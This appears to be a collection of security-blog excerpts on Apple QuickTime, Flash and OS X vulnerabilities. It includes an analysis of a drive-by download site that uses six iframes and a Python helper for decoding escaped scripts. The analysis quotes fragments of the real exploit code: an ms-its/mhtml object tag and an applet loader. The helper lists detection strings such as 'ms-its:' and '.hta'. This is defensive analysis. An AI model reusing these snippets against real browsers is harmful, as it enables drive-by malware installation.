We have learned that, from around December 1, web pages existed that attack a security hole in Apple QuickTime. Accessing a web page containing the attack code ultimately results in multiple malicious programs being installed on the system. At present Apple has not released an update that fixes the security hole; in other words, this is a "zero-day attack". Only a very small number of attack sites have been confirmed so far, so the risk of encountering the attack is low, but an increase and spread of attacks can naturally be expected, and caution is required. (more…)
Read more
Apple released a security update for their media player, Quicktime, which affects Windows and Mac users. The security flaws found in Quicktime players tend to crash the player or execute arbitrary code when exploited. More details about the security update here.
Next update is on Adobe Flash Player where an attacker can take control of the affected system upon successful exploitation of the vulnerability found in the player. Adobe tagged this vulnerability as critical and recommends software update on all Windows and Mac OS users of Adobe Flash Player versions 8.0.24.0 and earlier. More details about the update here.
It is advised that users apply security updates not only to the operating system. Security updates should also be applied to third-party software, as such software can be an attack vector for malware that compromises your system even if your OS is fully patched.
Users can find the download page of the software updates mentioned by following the hyperlinks:
Read more
Hi folks!
Yep, it’s time to upgrade your Quicktime media player to version 7.1 whether you’re a Windows OS or a Mac OS user (as long as you use Quicktime player).
This upgrade is released to fix security holes found in the media player. The upgrade fixes security holes in viewing crafted images and movies (according to SANS). You may also read the release notes for further details of the upgrade.
Meanwhile, while upgrading your Quicktime in your Mac OS, you should consider patching up your system with Apple’s Security Update 2006-003. Read on about the update here.
Visit Apple website for the Quicktime upgrade and Mac OS Security Update 2006-003.
Read more
Yeah you know what I mean. After Apple updated OS X 10.4.5 to OS X 10.4.6 which addressed critical security vulnerabilities, there are other possible vulnerabilities found in the updated OS X. A guy, by the name Tom Ferris, claims to have found the following vulnerabilities in the updated OS X.
- Apple OS X 10.4.5 .tiff “LZWDecodeVector ()” Heap Overflow
- Apple OS X BOM ArchiveHelper .zip Heap Overflow
- Apple OS X Safari 2.0.3 Multiple Vulnerabilities
- Apple OS X 10.4.6 “ReadBMP ()” .bmp Heap Overflow
- Apple OS X 10.4.6 “CFAllocatorAllocate ()” .gif Heap Overflow
- Apple OS X 10.4.6 .tiff “_cg_TIFFSetField ()” DoS
- Apple OS X 10.4.6 .tiff “PredictorVSetField ()” Heap Overflow
The first vulnerability was patched in OS X 10.4.6; however, the other vulnerabilities are claimed to be unpatched in Apple OS X 10.4.6, although they have already been reported to Apple.
All of these have been reported to product-security@apple.com around the beginning of this year. From what I have been told, they “will be fixed in the next security release”.
You may follow this link to the original article.
By the way, users who haven’t patched their OS X machines are advised to update to Apple OS X 10.4.6. You may visit Apple’s update page here.
Read more
In light of recent vulnerabilities in MacOSX, Apple has released their Security Update 2006-001. I’ve browsed through some of the vulnerabilities, and it seems as if some of them are possible worm vectors for Mac. I’ll get to play around with these vulnerabilities in the next few weeks because we just got a Mac machine! Niiiiice. And oh, here’s a writeup from ISC on the recent Apple patches: http://isc.sans.org/diary.php?storyid=1160.
“…This update is very critical to install on your Mac OS X machines…”
Read more
An article has been published describing a flaw in the Apple Safari browser running on OS X. The flaw is said to cause immediate execution of files just by visiting a website.
An option in the browser, “Open ‘safe’ files after downloading” (activated by default), causes the browser to automatically open “safe” files such as zip archives. However, a shell script with no “shebang line” (such as “#!/bin/bash”) will be executed without user interaction. Read the article here for the full story.
For now it is highly recommended to disable the option “Open ‘safe’ files after downloading” until an update that fixes the flaw is made available.
Update(JJ, 21 February 2006 18:20:49)
Updates from ISC.
This actually looks more serious than we initially thought. The workaround specified above will prevent Safari from automatically executing the PoC file, but it looks like your machine is still vulnerable, and it doesn’t need Safari to run this file at all.
Update(JJ, 23 February 2006 20:30:27)
More updates from ISC!
…the Mail application is vulnerable as well. What’s even worse, the attacker doesn’t need to send a ZIP archive; the shell script itself can be disguised to practically anything.
Here’s the link again: http://isc.sans.org/diary.php?storyid=1138
Read more
eEye Digital Security has published four (4) advisories related to Apple Quicktime vulnerabilities. These vulnerabilities were marked as critical because they can cause remote arbitrary code execution. In effect, the attacker can control the affected system with the same privileges as the logged in user.
The vulnerabilities are enumerated below with a short description of each.
Apple QuickTime STSD Atom Heap Overflow
The vulnerability allows a remote attacker to reliably overwrite heap memory with user-controlled data and execute arbitrary code in the context of the user who executed the player or application hosting the QuickTime plug-in.
Apple iTunes (QuickTime.qts) Heap Overflow
The vulnerability allows an attacker to reliably overwrite heap memory with user-controlled data and execute arbitrary code in the context of the user who executed iTunes.
Apple QuickTime QTIF Stack Overflow
There is a stack overflow in the way QuickTime processes qtif format files. An attacker can create a qtif file and send it to the user via email, web page, or qtif file with activex and can directly overflow a function pointer immediately used so it can bypass any stack overflow protection in systems such as xp sp2 and 2003 sp1.
Apple QuickTime Malformed GIF Heap Overflow
…a critical heap overflow in the Apple Quicktime player that allows for the execution of arbitrary code via a maliciously crafted GIF file.
This flaw has proven to allow for reliable control of data on the heap chunk and can be exploited via a web site by using ActiveX controls.
The following systems are affected by these vulnerabilities.
- Quicktime on Windows 2000
- Quicktime on Windows XP
- Quicktime on Mac OS X 10.3.9
- Apple iTunes on Windows 2000
- Apple iTunes on Windows XP
- Apple iTunes on OS X 10.3.9
Apple has released Apple QuickTime version 7.0.4 to solve these vulnerabilities. Mac OS X users should update their software by following the steps described in Apple’s web site. Windows 2000 and XP users should download Apple QuickTime 7.0.4.
By the way, the advisories were released on the same date as Microsoft released their latest security updates.
Read more
New methods have surfaced, and the spyware threat has just gotten “smarter”. Some sites already use several vulnerabilities in order to deploy a single file, banking on the hope that at least one of these methods will hit an unpatched vulnerability and compromise the system.
Many sites have already employed this method of deploying malicious content onto a system, and here’s a view of what happens with our sample site.
Either by redirection or from some other website, the user is taken to <BLOCKED>/RC, a site which contains an ANI file exploit and 6 iframes that contain different methods of pushing a certain file onto a user’s system. Depending on the security employed by the system and the patches that are in place, the user’s PC may execute one, two, or all of the contents of the 6 iframes.
IFRAME 1: http://<BLOCKED>/RC/exp_4/index.htm
- The code is escaped three times before the malicious code is revealed. And even then, it is filled with garbage code in order to confuse the scanner.
- Then the file downloaded from <BLOCKED>/RC/web.exe will be dropped and launched in the system.
FINAL CODE:
IFRAME 2:
- Same as IFRAME 1.
IFRAME 3: http://<BLOCKED>/RC/exp_sp6/index.htm
- This is also escaped three times, in a non-straightforward manner, before the final code is revealed.
- Then, a CHM file will be launched. This CHM file will drop and launch web.exe by exploiting the MS04-013 vulnerability; this is the same file launched by the earlier IFRAME.
FINAL CODE:
document.write('<object data="ms-its:mhtml:file://c: c.mht!'+PATH+'::/logo.php" type="text/x-scriptlet"></object>');
IFRAME 4: http://<BLOCKED>/RC/exp_3/index.htm
- Escaped three times; the final code then contains garbage code to confuse the scanner.
- Then, the final code will launch web.exe using a vulnerability.
FINAL CODE:
IFRAME 5: http://<BLOCKED>/RC/exp_sp60/index.htm
- The code is clear for this part.
- It opens <BLOCKED>/RC/exp_sp60/int.htm which will execute: <BLOCKED>/RC/exp_sp60/final/int.hta
- The end result is similar to that of the earlier IFRAMEs.
IFRAME 6: http://<BLOCKED>/RC/exp_5/index.htm
- The code is still escaped three times before the final code is revealed.
- And the final code will execute both web.exe from <BLOCKED>/RC/web.exe and count.jar (JAVA_BYTEVER.A) from <BLOCKED>/RC/exp_5/count.jar
document.write("<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>");
document.write("<PARAM NAME='url' VALUE='"+PATH+"'>");
document.write("");
Sites that peddle spyware and their cohorts (downloaders and droppers) will employ all possible techniques just to push them onto the user’s system. Against aggressive methods such as this, we need to be vigilant in applying the latest patches to secure our systems.
Read more
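The post describes iframes whose script is escaped three times and padded with junk statements before the final code appears. As an added example (not code from the original post or from the site it analyses), here is a small Python triage helper that peels nested eval(unescape("...")) layers the way an analyst would before reading the final payload, then flags strings worth a closer look. The three-times-escaped sample script, the junk variables and the indicator list are all constructed for this demo; the ms-its: object it decodes to is a placeholder, not the original site's content.

```python
"""Peel nested escape() layers from a captured page script for triage.

Added example, not from the original post. The sample script and the
indicator list below are constructed for the demo.
"""
import re
import urllib.parse

# Finds an eval(unescape("...")) or document.write(unescape('...')) wrapper
# anywhere in a layer, so surrounding junk statements are simply dropped.
WRAPPER_RE = re.compile(
    r"""(?:eval|document\.write)\s*\(\s*unescape\s*\(\s*(['"])(.*)\1\s*\)\s*\)\s*;?""",
    re.S,
)

# Strings that, in this added example, warrant a closer look in the final layer.
INDICATORS = ("ms-its:", ".hta", "<object", "<applet", ".exe")


def js_unescape(s: str) -> str:
    """Decode JavaScript escape() output: %uXXXX code units, then %XX bytes."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    # latin-1 keeps one %XX = one character, matching JavaScript's unescape().
    return urllib.parse.unquote(s, encoding="latin-1")


def peel_layers(script: str, max_layers: int = 10):
    """Strip one unescape() wrapper per pass; return (final_code, layers_removed)."""
    current, layers = script, 0
    while layers < max_layers:
        m = WRAPPER_RE.search(current)
        if not m:
            break
        current = js_unescape(m.group(2))
        layers += 1
    return current, layers


def find_indicators(code: str):
    """Return the indicator strings present in the decoded code (case-insensitive)."""
    lowered = code.lower()
    return [i for i in INDICATORS if i in lowered]


def js_escape(s: str) -> str:
    """Mimic JavaScript escape() so the constructed sample round-trips exactly."""
    out = []
    for ch in s:
        if (ch.isalnum() and ch.isascii()) or ch in "@*_+-./":
            out.append(ch)
        elif ord(ch) < 256:
            out.append("%%%02X" % ord(ch))
        else:
            out.append("%%u%04X" % ord(ch))
    return "".join(out)


def build_sample() -> str:
    """Constructed sample: a payload wrapped in three escape layers, each padded
    with junk variables, loosely imitating the layout described in the post."""
    payload = """document.write('<object data="ms-its:EXAMPLE.chm::/x.htm"></object>');"""
    wrapped = payload
    for i in range(3):
        wrapped = 'var pad%d = 0x%04x; eval(unescape("%s")); var tail%d = 0;' % (
            i, 0x1000 + i, js_escape(wrapped), i)
    return wrapped


if __name__ == "__main__":
    final, n = peel_layers(build_sample())
    print("layers removed:", n)
    print("final code:", final)
    print("indicators:", find_indicators(final))
```

Each pass drops the junk around the wrapper and decodes only what is inside it, so a sample padded with "garbage code" still decodes to the innermost statement; the layer count and indicator hits are what a scanner rule or analyst note would record.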
Trend Micro has observed unusual infections related to Xcode developer projects. Further investigation revealed that a particular developer's entire Xcode project contained source malware, leading to the retrieval of malicious payloads. This article summarizes our findings on the Mac malware "XCSSET". Details of this attack are available in the technical brief here. Trend Micro detects the initial intruding malware as "TrojanSpy.MacOS.XCSSET.A" and the files related to command and control (C&C) as "Backdoor.MacOS.XCSSET.A".
Figure 1: Sample Xcode project containing the source malware and an example of its contents (more…)
Read more